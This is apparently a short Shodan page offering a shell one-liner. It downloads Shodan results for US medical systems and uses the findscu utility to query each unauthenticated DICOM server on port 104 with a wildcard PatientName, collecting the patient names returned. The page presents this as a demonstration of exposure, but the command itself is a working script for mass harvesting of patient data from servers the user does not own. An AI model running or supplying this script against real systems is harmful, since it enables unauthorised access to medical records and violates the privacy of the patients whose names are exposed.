Count patient names in US exposed DICOM medical servers with no authentication

~ $
shodan download search "tag:medical" "country:us"; shodan parse --fields ip_str search.json.gz > usa_dicom_ip ; for i in `cat usa_dicom_ip` ; do echo "///// Now connecting to $i ////" ; findscu -v -to 1 -P -k PatientName="*" $i 104 >> us_dicom_patient_names; wc -l us_dicom_patient_names ; done


Demonstrates real world patient data exposure. Script downloads Shodan search, parses and then uses FINDSCU utility to query Dicom server over port 104, then greps and counts number of times PatientName appears.

Contact Us

Shodan ® - All rights reserved